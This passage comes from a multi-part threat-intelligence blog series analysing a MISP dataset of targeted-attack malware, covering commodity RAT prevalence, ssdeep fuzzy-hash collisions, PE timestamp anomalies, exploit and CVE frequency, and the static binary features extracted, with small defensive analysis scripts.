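  return null;
}

// Count how often each family appears in a list of detection names.
function countFamilies(detectionNames) {
  const counts = {};
  for (const detection of detectionNames) {
    const family = ratFamily(detection);
    if (family) counts[family] = (counts[family] || 0) + 1;
  }
  return counts;
}

// Illustrative detection strings only, not taken from our data set.
const detections = [
  "Backdoor:Win32/Fynloski.A",
  "Backdoor:Win32/Plugx.A",
  "Backdoor:Win32/Xtrat.A",
  "Trojan:Win32/Example.A",
  "Backdoor:Win32/Plugx.B",
];

console.log(countFamilies(detections));
```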

The “lazy king of APTing”, so to say, is PlugX. The commodity RAT popped up in altogether 15 different events listed in the MISP database.

4_2_plugx

The winner in sample numbers was Adwind, a Java based RAT, designed to infect different platforms. Adwind itself is malware that has been sold under different names, including Frutas RAT and Unrecom RAT. Security firm Fidelis published nice insights on Adwind, under the much appreciated title “RAT in a jar”.

The following graphic shows the total number of RATs and related events, found within our data set of 326 events containing 8,927 malware binaries.

4_3_ratpack

In total, we counted that almost a quarter of inspected events made use of one or another RAT. Looking at the sample set, 1/9th of the total set is composed of pre-built RATs. These numbers are rather high, considering that, at least in the heads of analysts, targeted malware is complex and sophisticated.

Still, though, why do we even bother with high numbers of commodity malware? For one, as mentioned before, they help driving down attack cost. Furthermore, they provide functionality that is quite advanced from the beginning, equipping even unskilled attackers with a Swiss Army Knife of malware they couldn’t implement themselves, even if they tried really hard. These do-it-yourself APT tools enable wannabe spies with little budgets, growing the number of potential offenders.

Furthermore, off-the-shelf RATs have been seen in use by certain advanced attackers. They could lead to confusion about the actual offender, as they do not allow for attribution on the basis of the binaries at all. In other words, one would not know whether one is being targeted by a script kiddie or a nation state actor. Currently, it remains unclear whether commodity RATs have been used in an attribution concealment approach, but the assumption suggests itself.

The Kings In Your Castle Part 3: Ssdeep being fuzzy while exploits are being scarce

Welcome back, still on it? This is part 3 of our blog series, if you’re curious about part 1 and 2, please check them out here and here. This time I’m happy to introduce a set of borderline funny findings and tackle one of the hypotheses we put together for Raphael Vinot’s and my talk “The Kings In Your Castle”, presented at this year’s Troopers Conference in Heidelberg. I will discuss our findings regarding exploits present in known targeted attacks, the obstacles we faced during analysis and how we worked our way around. So, sit back, relax, here we go.

Curiosities

As you might be aware, most data sets come with information, and most also show one or another curiosity. Finding curiosities means learning literally unexpected things, which is why researchers jump at those with the passion of a hungry wolf. Thus, let me start the list of our findings with a curiosity.

While performing clustering on ssdeep hashes we found something we dubbed ssdeep collisions, for lack of a better name. Ssdeep is a program for computing context triggered piecewise hashes. These so-called fuzzy hashes, as opposed to cryptographic hashes, do not uniquely identify a given data blob. They are calculated piecewise and are able to identify shared byte sequences among two targets. They are frequently used to ‘describe’ malicious binaries, in order to be able to match with similar binaries and eventually find groups of malware samples or even identify malware families.

The nature of piecewise hashes, though, implies that hashes of two binaries cannot be identical if the binaries show differences. Hence, it is a curious finding that a number of unique samples within our set showed identical ssdeep hashes. Without spending too much time picking at the implementation of the fuzzy hashing algorithm itself, we assume that ssdeep does not consider the entire binary for hashing. We found a case where 5 MB of empty padding were no reason for ssdeep to show any difference in the resulting fuzzy hash.

ssdeep

More than padding, ssdeep on some occasions indeed missed significant differences in the data sections of compared binaries. Given that analysts and corporations use ssdeep in workbenches and production systems, we found it worth a mention that identical fuzzy hashes by no means prove that the compared binaries are identical.

diffs
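Spotting such collisions in a sample set is straightforward once both a fuzzy hash and a cryptographic hash are stored per sample. The sketch below groups samples by ssdeep hash and reports groups containing more than one distinct SHA-256 value. The record layout, the function name and the placeholder hash strings are assumptions for illustration.

```javascript
// Group samples by fuzzy hash and report groups whose cryptographic
// hashes differ, i.e. distinct files sharing one ssdeep hash.
function findFuzzyCollisions(samples) {
  const byFuzzy = new Map();
  for (const { ssdeep, sha256 } of samples) {
    if (!byFuzzy.has(ssdeep)) byFuzzy.set(ssdeep, new Set());
    byFuzzy.get(ssdeep).add(sha256);
  }
  const collisions = [];
  for (const [ssdeep, hashes] of byFuzzy) {
    if (hashes.size > 1) collisions.push({ ssdeep, sha256: [...hashes] });
  }
  return collisions;
}

// Placeholder values, not real hashes.
const fuzzySamples = [
  { ssdeep: "fuzzy-hash-A", sha256: "sha256-of-file-1" },
  { ssdeep: "fuzzy-hash-A", sha256: "sha256-of-file-2" },
  { ssdeep: "fuzzy-hash-B", sha256: "sha256-of-file-3" },
  { ssdeep: "fuzzy-hash-B", sha256: "sha256-of-file-3" },
];

console.log(findFuzzyCollisions(fuzzySamples));
```

Exact duplicates (same SHA-256) are deliberately not reported, since an identical fuzzy hash is expected for them.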

We learned another curiosity when randomly staring at the gathered data. It is fascinating how the human eye manages to find patterns, and indeed very instructive before starting to implement queries or planning for application of machine learning. This way we saw that, for example, compilation timestamps of binaries usually follow loose patterns within an event. A number of events though show outliers when it comes to timestamps, such as a binary compiled in 1996 while others are compiled post-2007, or a binary with a stamp from 2036. Of course, such outliers can have multiple explanations. The ones that come to mind the fastest are that the timestamps are falsified, the attackers forgot to falsify all timestamps, the campaign made use of readily compiled (old) tools, or maybe a runtime packer was used which falsifies the timestamps without explicit intention of the attackers.

20136time

One conclusion, though, is at hand. To freely quote a splendid APT researcher, attackers learn just like we do and improve over time, which implies that they might have made more mistakes in the past. Thus, by analyzing historical data about a campaign or group one might be able to learn unexpected tidbits. Moreover, by looking at what the attacker learned, as seen in changes in malware and intrusion techniques, one might gather insights about obstacles the attackers faced in the past. Adopting a runtime packer or adding a stealth module to a given RAT might reveal that the attacker’s tools were at some point detected by security software.

1970time

 

OMFG!! They used e.x.p.l.o.i.t.s.!!1!

Like in real life, humans tend to conclude that a digital attack which caused big damage naturally came with big power. In the world of cyber, though, this equation has a lot of unknowns. In fact, the success of an attack and the damage it can cause are influenced by many factors that are independent of an attacker’s capabilities and wealth. While not true in all cases, the possession of one or more 0-days mostly involves some level of resources, or at least explicit know-how combined with engineering time.

This leads to a natural assumption: folks who do APTs involving 0-days must be either rich or very, very dedicated. Or both. Or must they? When Stuxnet finally happened, the general public seemed to believe that APT goes hand in hand with 0-day. A considerable time span passed before the understanding started to sink in that targeted attacks can have all sorts of faces, and that barely any post-Stuxnet attack looked anything like what we now call “the first cyber weapon”.

By now, analysts seem to have settled on the understanding that Word macros are just as dangerous to organizations as the latest Flash exploit. There is always someone to open the damn document.

Finally, what this leaves us with is a set of uncertainties. How important are exploits in the APT world? How frequently are they used, how common is the use of precious 0-days? This is the fog we meant to shed some light on.

 

Exploit prevalence at a glance

In the mass malware scene, the number of malware strains and infection campaigns that make active use of exploits feels rather low, and seemingly has even declined, at least since attackers found out that macro downloaders do the job just as well. It won’t escape the attentive reader that Word macros are a lot easier to write and cheaper to get hold of. And here we are again: reducing the cost of an attack makes it possible to maximize the number of potential targets. It’s all about resources.

But let us get to the numbers. In total, we analyzed 326 events within our final analysis set, of which 54 were labeled as involving one or more exploits. Such labels are usually CVE number tags added by the initial reporter of an event. What we do know about these tags is that a present tag is a strong indicator of an actual exploit being involved (given that analysts didn’t make things up); the lack of a tag, though, does not prove at all that no exploits were used. As a counter metric, we used the detection names of Microsoft Defender, filtering for names containing a CVE number. This way we detected a total of 68 events involving exploits.

Juggling numbers, and keeping potentially missed detections in mind, roughly a fifth of the analyzed events involved the use of exploits. Even with all potential data incorrectness in mind, we are very confident in stating that it is not a majority of targeted attacks that involves exploits.
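For readers who want to check the "roughly a fifth", here is the arithmetic spelled out. The three counts are the ones stated above; the variable names are only for this example, and the two labeling methods are shown side by side rather than combined, since their overlap is not given here.

```python
total_events = 326      # events in the final analysis set
tagged_events = 54      # events carrying a CVE tag in MISP
detected_events = 68    # events with a CVE number in a Defender detection name

tagged_share = tagged_events / total_events
detected_share = detected_events / total_events

print(f"CVE tags:        {tagged_share:.1%}")    # 16.6%
print(f"Detection names: {detected_share:.1%}")  # 20.9%
```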

 

The APT exploit landscape

Relying on tags that are present in the MISP data set, we went on to evaluate the exploits we indeed did see. The graphic below shows a chart of CVE numbers, sorted first by tag counts, secondly by year. The numbers refer to the number of events that make use of the listed CVEs.
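The ordering of such a chart can be sketched in a few lines, assuming the CVE tags have been pulled into a mapping from event ID to a list of CVE numbers. The event IDs and their tag assignments below are invented, and breaking ties by ascending year is an assumption of this example.

```python
from collections import Counter


def rank_cves(event_cves):
    """Count events per CVE; order by count (descending), then by CVE year."""
    counts = Counter()
    for cves in event_cves.values():
        counts.update(set(cves))  # count each CVE at most once per event
    return sorted(
        counts.items(),
        key=lambda item: (-item[1], int(item[0].split("-")[1]), item[0]),
    )


# Hypothetical event-to-CVE mapping, not our real data.
event_cves = {
    101: ["CVE-2012-0158"],
    102: ["CVE-2012-0158", "CVE-2015-5119"],
    103: ["CVE-2010-3333", "CVE-2015-5119"],
    104: ["CVE-2012-0158"],
}
ranking = rank_cves(event_cves)
```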

It is worth mentioning that human analysts as well as security software tend to be more reliable in labelling well-known exploits than fresh or even unknown ones. This chart cannot be used to determine which attacks involved 0-day exploits; in fact, none of the data we have at hand can.

[Figure: CVE numbers by number of events]

What it does show though is how the curve from frequently to non-frequently seen CVEs holds remarkably old vulnerabilities in the top spots. Absolutely killing it is CVE-2012-0158, a vulnerability within an MS Office OCX library. It can be triggered through a malicious Word document. The vulnerability has long been fixed by Microsoft, but, perhaps, not all Office installations are updated all that frequently? Who knows.

Furthermore, we can see that only a minority of 7 CVE numbers can be called more or less up to date. Given that our data collection ended January 2016, vulnerabilities from 2015 are considered fresh (enough). A total of 12 events involved exploits for non-cyber-stoneage vulnerabilities.

Exceptionally interesting is place number three on the list, CVE-2015-5119, sported by a total of five events. This vulnerability has a history, indeed.

 

HackingTeam exploit gone wild

CVE-2015-5119 is a vulnerability in Adobe Flash, which was leaked in the tremendous breach of the Italian offensive security company HackingTeam last year. The vulnerability was reported and fixed soon after the breach, but nevertheless made it into at least one exploit pack and the toolsets of four quite well-known APT groups. According to our data, Group Wekby and a not further identified spearphishing campaign targeting US government institutions adopted respective exploits right after the breach went public, in July 2015.

The most recent sighting of CVE-2015-5119 within our data was at the beginning of 2016, when it was seen in the context of BlackEnergy, the notorious malware that took the Ukrainian power grid offline at the end of 2015.

5119

 

Discussing the results

The numbers in the dark, that is, everything we do not know, are a significant blind spot in our dataset. There are two considerable unknowns. One, we do not know whether the data is complete. Two, we do not know whether the labels we retrieved are correct.

Concerning problem number 1, intentionally incomplete reports aside, it is very well possible that an attack is detected and remediated, but the actual infection vector is never recovered. When an exploit is used that, for example, is not contained in an e-mail or a file, the forensic reconstruction of the entire intrusion path can be challenging. A good example of such a case, and also a very instructive read on the topic, is Phineas Fisher’s write-up of the HackingTeam breach.

Problem number 2, incorrect labeling, stems from the fact that determining the CVE number for an actual exploit requires careful analysis work by a specialist. In practice, deriving CVE numbers from AV detection names is “cheap” and works reasonably well, but relies on the respective analysts doing a scrupulous job when looking into the sample. Mistakes are nevertheless quite possible.
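To show how “cheap” this derivation is, here is a small sketch that pulls CVE identifiers out of detection names with a regular expression. The detection names are illustrative examples of the naming style, not entries from our data set, and the function name is hypothetical.

```python
import re

# CVE identifiers: "CVE-", a four-digit year, then four or more digits.
CVE_PATTERN = re.compile(r"CVE-(\d{4})-(\d{4,})", re.IGNORECASE)


def cves_from_detection_name(name):
    """Return normalized CVE identifiers found in an AV detection name."""
    return sorted({f"CVE-{year}-{num}" for year, num in CVE_PATTERN.findall(name)})


# Illustrative detection names; the last one carries no CVE number.
names = [
    "Exploit:Win32/CVE-2012-0158",
    "Exploit:SWF/CVE-2015-5119.A",
    "Backdoor:Win32/Example.A",
]
found = {name: cves_from_detection_name(name) for name in names}
```

An empty result only means the name carries no CVE number; it says nothing about whether the sample uses an exploit.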

As in all given cases, I am happy to receive suggestions on how to improve on both shortcomings. Meanwhile, we present the discussed numbers with a pinch of salt on the side.

 

The Kings In Your Castle Part #2 – Dataset and feature extraction

Welcome back to my series of write-ups for “The Kings In Your Castle – All the lame threats that own you, but will never make you famous”. This series covers a project I presented together with Raphael Vinot from CIRCL Luxembourg at Troopers conference in March. If you missed the start, you can find it here.

O’right, let’s go 😀

TTPAs – Tools, Techniques, Procedures and Actors

The primary aim in the toolification process was to extract accurate binary features that would help us describe the binaries in relation to the event data stored in MISP. Therefore we took the feature extraction a step further than the usual creation of IOCs (Indicators of Compromise) would.

IOCs are indicators which describe malware used in an attack or attributes of an attack. They are easy and comparatively quick to create, and are then distributed and leveraged to scan computers or networks for compromises. They differ from classical, heuristic malware detection in that indicators are not limited to a per-file basis, but can also describe domain names of remote servers, names of files created by malware or IP addresses.

Despite their many advantages, though, IOCs deal in rather shallow features. Domain names, file names or strings within binaries can easily be changed in the course of an operation, at the will of the actor. A goal of our research was to extract more granular file features from different domains than the usual IOCs cover; in a sense, more “expensive” features that we considered less volatile than domain names. This way we expected to find links among different events contained in MISP that the usual indicators miss. In a targeted operation, it is considered expensive to change a toolset, rewrite malware or switch infection vectors, for example by purchasing a new exploit. Currently used indicators lack the capability to describe “expensive metrics”, hence the idea to widen the feature space.

However, extraction of binary features is not at all a trivial task. The technical implementation of feature extraction aside, it lies within the nature of malicious binaries to hide their features as thoroughly as possible; any features, that is. Runtime packing, obfuscation and sandbox evasion are just a few of many techniques that malware authors use to hinder analysis, which in general makes feature extraction difficult.

The following lists show attributes that were gathered from MISP, as well as those we extracted from the malicious binaries. All attributes are obtained statically, meaning without executing the binaries. Purely static analysis is frequently faster than dynamic analysis, its tools are more portable, and it scales better to large sample sets. In addition, we worked with the hypothesis that targeted malware frequently comes unpacked and without obfuscation. On the other hand, if an actor decides to rely on runtime packing, it is an interesting question whether he uses a custom packer or a commercial one, and whether samples were individually packed with a dedicated packer. One would think ‘no’, right?

I will go into more detail on the packer-or-no-packer questions in a follow-up blogpost. For the time being, I’ll ask you for the benefit of the doubt that our test set of binaries supplied us with considerably useful data. Here goes our feature list, fitted with short explanations of the underlying train of thought.

MISP data

  • Event ID
  • Event description
  • Event Submission date
  • CVE numbers associated with malware of given event
  • Domains associated with malware of given event

The attributes we pulled out of MISP mainly describe the respective events to which the binary hashes of our set are linked. This information is highly valuable, as it puts the malware into context. Events in MISP are frequently linked to vendor reports, which provide plenty of context for an operation. Furthermore, the event submission date roughly indicates the time when the operation was reported. CVE numbers are considered an indicator of whether the operation involved exploits. This is a rather soft metric: the lack of an entry for a CVE number does not at all prove that no exploits were used by a given malicious actor. Nonetheless, listed CVE numbers are valuable information.

Sample data

  • MD5
  • SHA1
  • Associated Event ID
  • Filetype
  • Filesize
  • Ssdeep hash
  • Detectionname of Microsoft Defender

Sample data is a set of descriptive features that apply to any file type. In the course of our research we put our main focus on Windows executable files, as these form the biggest group within the analyzed sample set. Our decision to add detection names from the Microsoft Defender anti-virus solution is based on Microsoft’s accuracy in assigning names to malware. This knowledge we draw from experience alone, although empirical tests have shown excellent results in the past.

An interesting attribute among this set is the ssdeep hash of a file. Ssdeep is an algorithm that calculates a fuzzy hash of a given data blob. Fuzzy hashes do not uniquely identify the base data, but are calculated piecewise. This way ssdeep makes it possible to determine similarities among files, and even to draw conclusions about the degree of difference between two given files. For more information about ssdeep and fuzzy hashes please visit the sourceforge website. A drawback of fuzzy hashing is that the computing load required for comparing binaries increases considerably with the number of binaries.
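To put a number on that drawback: assuming a naive all-against-all comparison, which is the simplest approach and not necessarily what any given tool does, the number of hash comparisons is n(n - 1)/2 for n samples. A short sketch, using the size of our cleaned sample set (8,927 samples) as the last value:

```python
from math import comb


def pairwise_comparisons(n):
    """Number of unordered pairs among n samples: n * (n - 1) / 2."""
    return comb(n, 2)


for n in (100, 1_000, 8_927):
    print(n, pairwise_comparisons(n))
# 100 4950
# 1000 499500
# 8927 39841201
```

Ten times the samples means roughly a hundred times the comparisons, which is why clustering on fuzzy hashes gets uncomfortable quickly.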

Executable data

  • Compilation time stamp
  • Imphash value
  • Entry point address
  • Section count
  • Original filename
  • Section names for sections 1-6
  • Section sizes for sections 1-6
  • Section entropies for sections 1-6
  • Number of TLS sections
  • Entry point section
  • Count of calls to Windows APIs
  • Ratio of API call count to filesize

Finally, for the subset of Windows executable files we collected a wealth of descriptive indicators, which apply to meta-information and the internal structure of compiled binaries. Compilation timestamps of binaries can easily be changed, that is true, therefore they have to be taken with a pinch of salt. Individual cases have shown, though, that looking at a campaign over a period of time, that is, following related events on MISP, sometimes yields unexpected information “leaks”. Actors might make a habit of falsifying timestamps, but to err is human, and sometimes we encounter binaries with seemingly real timestamps. That said, it is obviously of interest to find attacks related to one specific incident, as historical data can reveal unknown traits of a specific actor.
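The compilation timestamp is easy to get at statically. The following sketch reads it straight from the PE headers with the standard library only; it is an illustration of where the field lives, not the extraction code we used. The test header at the bottom is hand-built for the example.

```python
import struct
from datetime import datetime, timezone


def pe_compile_time(data):
    """Read the COFF TimeDateStamp from raw PE bytes, or return None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    # e_lfanew at offset 0x3C points to the "PE\0\0" signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if len(data) < pe_offset + 12:
        return None
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        return None
    # COFF header after the signature: Machine (2 bytes),
    # NumberOfSections (2 bytes), TimeDateStamp (4 bytes).
    (stamp,) = struct.unpack_from("<I", data, pe_offset + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


# Hand-built minimal header for the example, with a timestamp of 0.
header = bytearray(0x40 + 24)
header[:2] = b"MZ"
struct.pack_into("<I", header, 0x3C, 0x40)
header[0x40:0x44] = b"PE\x00\x00"
struct.pack_into("<HHI", header, 0x44, 0x014C, 3, 0)
compiled = pe_compile_time(bytes(header))
```

A stamp of zero decodes to 1 January 1970, which is one way a binary ends up looking older than the PE format itself.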

A number of PE attributes serve the detection of packed binaries. The count of PE sections, section names, sizes and entropies, the count of TLS (Thread Local Storage) sections and the section of the entry point, for example, are considered indicators of whether a runtime packer protects the executable. This is interesting information by itself, as it lets us conclude which actors use packed malware, which don’t, and which packing habits the different actors have.
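Section entropy is the most intuitive of these indicators: compressed or encrypted data looks close to random, so its entropy approaches 8 bits per byte. A minimal sketch of the calculation over raw section bytes, using only the standard library (how the section bytes are obtained is left out here):

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return sum((n / total) * math.log2(total / n)
               for n in Counter(data).values())


padding = shannon_entropy(b"\x00" * 1024)     # a single repeated byte value
uniform = shannon_entropy(bytes(range(256)))  # every byte value exactly once
```

Where to draw the line between "packed" and "not packed" is a judgment call and depends on the section in question.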

Next to that, the attributes also serve to determine the similarity among binaries. While on unpacked binaries, the attributes are highly dependent on the compiler used to compile the binary, on packed executables the same data shows similarities of the various packers.

Two rather uncommon binary metrics we came up with are the total count of calls to Windows APIs within the code and the ratio of API call count to file size. The primary consideration here is that packed or protected executables show little interaction with the Win32 API. Another point of interest in these metrics is that the API calls within a binary relate to the actual binary structure. While code changes or additions within pieces of malware very likely change fuzzy hashes, the imphash, the file size and section attributes, the changes to the API call scheme should remain considerably small.

Data about the data

The beauty of the data collection process is that it left us with a set of malicious binaries that are somewhat guaranteed to have been part of a targeted attack at some point in the timeline of their use. Furthermore, with the help of MISP we are able to put the binaries into context, as we know in many cases which campaign they were involved in.

For picking events from MISP we applied a loose set of criteria. MISP’s events are pre-classified by the submitter, where a threat level of medium or high indicates that the event is likely of a targeted nature. From this group we handpicked events where the description suggested it deals with a known or at least an identified threat actor, or where the nature of the malware clearly suggested a targeted background, as themed spear phishing would.
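The first, mechanical part of that selection can be sketched as a simple filter, assuming events are available as dictionaries in the shape of MISP’s event JSON, where `threat_level_id` 1 stands for high and 2 for medium. The sample events below are invented, and the handpicking by description that followed was manual and is not modeled here.

```python
# MISP threat_level_id values: 1 = High, 2 = Medium, 3 = Low, 4 = Undefined.
TARGETED_LEVELS = {1, 2}


def candidate_events(events):
    """Keep events whose threat level is medium or high."""
    return [e for e in events if int(e["threat_level_id"]) in TARGETED_LEVELS]


# Hypothetical events; IDs and descriptions are made up.
events = [
    {"id": "1", "threat_level_id": "1", "info": "Themed spear phishing, actor X"},
    {"id": "2", "threat_level_id": "3", "info": "Commodity banking trojan"},
    {"id": "3", "threat_level_id": "2", "info": "Watering hole campaign"},
]
candidates = candidate_events(events)
candidate_ids = [e["id"] for e in candidates]
```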

The initial data collection started in November 2015, so the total set of events only includes cases submitted to MISP until the middle of December 2015. However, in follow-up work some of the feature correlation procedures have been adopted by MISP itself. For more details please refer to the website.

Please note that this procedure leaves quite some room for incorrectness. We assume by default that indicators reported by vendors and their context are correctly associated. This is not always the case, as we found out while performing tests; on some rare occasions data in vendor reports has turned out to be incorrect. As of now we have no insight into what percentage of reports contains errors. Furthermore, the events contained in MISP only show information that is actually reported, meaning that attacks which had yet to be discovered at the time of analysis, as well as attributes which are potentially missing from reports, are a blind spot in our research.

Finally, we started off with a set of 501 events, which we assumed to contain information about targeted attacks, containing a total of 15,347 malware samples. From this set we removed a subset of events which we determined to be overlapping with another event of the same attacker or incident. Duplicate entries happen, as MISP is not striving for accuracy but for completeness. The cleanup left us with a set of 326 events and 8,927 samples.

[Figure: file types of the entire sample set]

The graphic shows the file types of the entire sample set. It can be seen that Win32 PE executables are rather dominant. This is explained by the heavy use of repackaged commodity malware by some actors, but does not represent the general distribution of file types per event. Nevertheless, PE32 is the most important file type within the analyzed sample set, accounting for more than 11,000 of the total corpus of 15,347 samples.

In the next blogpost I’ll be introducing our results of an exploit-per-APT analysis, and write about one or another curiosity we found within our final data set.